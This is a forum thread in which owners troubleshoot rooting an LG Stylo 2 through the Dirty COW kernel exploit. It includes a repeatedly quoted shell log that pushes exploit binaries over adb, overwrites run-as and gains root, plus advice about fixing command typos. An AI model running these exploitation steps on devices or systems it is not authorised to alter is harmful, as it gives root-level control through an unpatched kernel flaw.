• After 15+ years, we've made a big change: Android Forums is now Early Bird Club. Learn more here.

Root Help Rooting LG Stylo 2

Same here Chmod: not found Screenshot attached.

Did you make sure your ADB folder had ALL the contents removed/deleted & all that is included in the zip put in instead? Just one or the other of a duplicate could trainwreck it........\
Rechecking everything now........
 
ADB folder contents from XXX.zip
 

Attachments

  • ADB contents.png
    ADB contents.png
    10.9 KB · Views: 130
yep...thats what i've got. in case you missed this post it this was my second attempt.

I run into the same thing. FIX: I deleted all contents in ADB folder, unzipped the dirtycow.tar inside of it again. Had to log off & back on but after this it went past the cow-execute part & continued on so..............

Also I noticed capital letters in the commands, my bad, there are no capitals in linux and that will stop it from being recognized. Change all of the Capitals to lowercase, especially if your copying & pasting, which is best to prevent typos!!!!!!
 

Attachments

  • ADB contents.png
    ADB contents.png
    10.9 KB · Views: 140
  • CMD screen.txt
    CMD screen.txt
    2.5 KB · Views: 150
Guys, I'm new to this and have been reading a lot but still seem kinda confused. I also tried to find an answer to my question but couldn't so forgive me if I missed it....
Can rooting be done if the device is network locked? If yes, can the phone be network unlocked by/through rooting it? Thanks a lot in advance!
 
I run into the same thing. FIX: I deleted all contents in ADB folder, unzipped the dirtycow.tar inside of it again. Had to log off & back on but after this it went past the cow-execute part & continued on so..............

Also I noticed capital letters in the commands, my bad, there are no capitals in linux and that will stop it from being recognized. Change all of the Capitals to lowercase, especially if your copying & pasting, which is best to prevent typos!!!!!!

oh and i still had to change permissions via es file manager. Chmod still said not found
 
oh and i still had to change permissions via es file manager. Chmod still said not found

It worked for me, even though its showing dirtycow is patched on ZV6, like I said, had to go through it just like from beginning deleting everything, unzipping the .tar file again in ADB. Sometimes 'creating' instead of just copying something into place will make it work when it will not otherwise.

With only you two so far attempting this, please, don't give up, backtrack, start over & create ADB on your computer, unzipping the .tar files contents into it. Make sure you have admin on your cmd screen (control + shift before clicking to open command screen), and it will (see text copy from my CMD screen) execute the dirtycow Xploit.

Good luck and let us know!
 

Attachments

  • CMD screen text 1.jpg
    CMD screen text 1.jpg
    174.8 KB · Views: 164
  • CMD screen text 2.jpg
    CMD screen text 2.jpg
    191.6 KB · Views: 190
  • CMD screen text 3.jpg
    CMD screen text 3.jpg
    269.6 KB · Views: 213
here is what I get:


C:\Users\Donny\Pictures\Logitech Webcam\XXX\Xploit 4 LG Stylo 2 (LGLS775ABB) ZV4 ZV5\ADB>adb push dirtycows /data/local/tmp
1576 KB/s (13728 bytes in 0.008s)

C:\Users\Donny\Pictures\Logitech Webcam\XXX\Xploit 4 LG Stylo 2 (LGLS775ABB) ZV4 ZV5\ADB>adb push cow-execute /data/local/tmp
1489 KB/s (13728 bytes in 0.009s)

C:\Users\Donny\Pictures\Logitech Webcam\XXX\Xploit 4 LG Stylo 2 (LGLS775ABB) ZV4 ZV5\ADB>adb shell
shell@ph1:/ $ chmod 0777 /data/local/tmp/dirtycows
chmod 0777 /data/local/tmp/dirtycows
shell@ph1:/ $ chmod 0777 /data/local/tmp/cow-execute
chmod 0777 /data/local/tmp/cow-execute
shell@ph1:/ $ /data/local/tmp/dirtycows /system/bin/run-as /data/local/tmp/cow-execute
/tmp/dirtycows /system/bin/run-as /data/local/tmp/cow-execute <
warning: new file size (13728) and file old size (17920) differ

size 17920


[*] mmap 0xb6d3b000
[*] exploit (patch)
[*] currently 0xb6d3b000=464c457f
[*] madvise = 0xb6d3b000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6d3b000=464c457f
shell@ph1:/ $ run-as -exec id
run-as -exec id
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'id' with 0 arguments

uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0
shell@ph1:/ $ run-as -exec sh
run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments

Failed to execute 'sh'!
1|shell@ph1:/ $ Chmod 0777 /system/bin/sh
Chmod 0777 /system/bin/sh
/system/bin/sh: Chmod: not found
127|shell@ph1:/ $ chmod 0777 /system/bin/sh
chmod 0777 /system/bin/sh
chmod: chmod '/system/bin/sh' to 100777: Read-only file system
1|shell@ph1:/ $
 
here is what I get:


C:\Users\Donny\Pictures\Logitech Webcam\XXX\Xploit 4 LG Stylo 2 (LGLS775ABB) ZV4 ZV5\ADB>adb push dirtycows /data/local/tmp
1576 KB/s (13728 bytes in 0.008s)

C:\Users\Donny\Pictures\Logitech Webcam\XXX\Xploit 4 LG Stylo 2 (LGLS775ABB) ZV4 ZV5\ADB>adb push cow-execute /data/local/tmp
1489 KB/s (13728 bytes in 0.009s)

C:\Users\Donny\Pictures\Logitech Webcam\XXX\Xploit 4 LG Stylo 2 (LGLS775ABB) ZV4 ZV5\ADB>adb shell
shell@ph1:/ $ chmod 0777 /data/local/tmp/dirtycows
chmod 0777 /data/local/tmp/dirtycows
shell@ph1:/ $ chmod 0777 /data/local/tmp/cow-execute
chmod 0777 /data/local/tmp/cow-execute
shell@ph1:/ $ /data/local/tmp/dirtycows /system/bin/run-as /data/local/tmp/cow-execute
/tmp/dirtycows /system/bin/run-as /data/local/tmp/cow-execute <
warning: new file size (13728) and file old size (17920) differ

size 17920


[*] mmap 0xb6d3b000
[*] exploit (patch)
[*] currently 0xb6d3b000=464c457f
[*] madvise = 0xb6d3b000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6d3b000=464c457f
shell@ph1:/ $ run-as -exec id
run-as -exec id
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'id' with 0 arguments

uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0
shell@ph1:/ $ run-as -exec sh
run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments

Failed to execute 'sh'!
1|shell@ph1:/ $ Chmod 0777 /system/bin/sh
Chmod 0777 /system/bin/sh
/system/bin/sh: Chmod: not found
127|shell@ph1:/ $ chmod 0777 /system/bin/sh
chmod 0777 /system/bin/sh
chmod: chmod '/system/bin/sh' to 100777: Read-only file system
1|shell@ph1:/ $

And your ZV4 ? And anytime a 'not found' comes up its either a typo or have to start from beginning again get it loaded up.
If your ZV4 and root fails... have to rethink what ZV4 patched!
 
here is what I get:


C:\Users\Donny\Pictures\Logitech Webcam\XXX\Xploit 4 LG Stylo 2 (LGLS775ABB) ZV4 ZV5\ADB>adb push dirtycows /data/local/tmp
1576 KB/s (13728 bytes in 0.008s)

C:\Users\Donny\Pictures\Logitech Webcam\XXX\Xploit 4 LG Stylo 2 (LGLS775ABB) ZV4 ZV5\ADB>adb push cow-execute /data/local/tmp
1489 KB/s (13728 bytes in 0.009s)

C:\Users\Donny\Pictures\Logitech Webcam\XXX\Xploit 4 LG Stylo 2 (LGLS775ABB) ZV4 ZV5\ADB>adb shell
shell@ph1:/ $ chmod 0777 /data/local/tmp/dirtycows
chmod 0777 /data/local/tmp/dirtycows
shell@ph1:/ $ chmod 0777 /data/local/tmp/cow-execute
chmod 0777 /data/local/tmp/cow-execute
shell@ph1:/ $ /data/local/tmp/dirtycows /system/bin/run-as /data/local/tmp/cow-execute
/tmp/dirtycows /system/bin/run-as /data/local/tmp/cow-execute <
warning: new file size (13728) and file old size (17920) differ

size 17920


[*] mmap 0xb6d3b000
[*] exploit (patch)
[*] currently 0xb6d3b000=464c457f
[*] madvise = 0xb6d3b000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6d3b000=464c457f
shell@ph1:/ $ run-as -exec id
run-as -exec id
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'id' with 0 arguments

uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0
shell@ph1:/ $ run-as -exec sh
run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments

Failed to execute 'sh'!
1|shell@ph1:/ $ Chmod 0777 /system/bin/sh
Chmod 0777 /system/bin/sh
/system/bin/sh: Chmod: not found
127|shell@ph1:/ $ chmod 0777 /system/bin/sh
chmod 0777 /system/bin/sh
chmod: chmod '/system/bin/sh' to 100777: Read-only file system
1|shell@ph1:/ $
I noticed in Ur post is saying zv4 zv5 that need to change to Ur software ware version
 
This doesnt work on the cricket k540. Failed to return root....
Their are alot of type-o in the mega files. No caps like on chmod. Runs should be run-as. Etc. Best to carefully type. Not to copy. I think they'll need different patch for k540 builds.
 
This doesnt work on the cricket k540. Failed to return root....
Their are alot of type-o in the mega files. No caps like on chmod. Runs should be run-as. Etc. Best to carefully type. Not to copy. I think they'll need different patch for k540 builds.

In that case I might as well just give up. I don't think there are many K540 users trying to achieve root.
 
Back
Top Bottom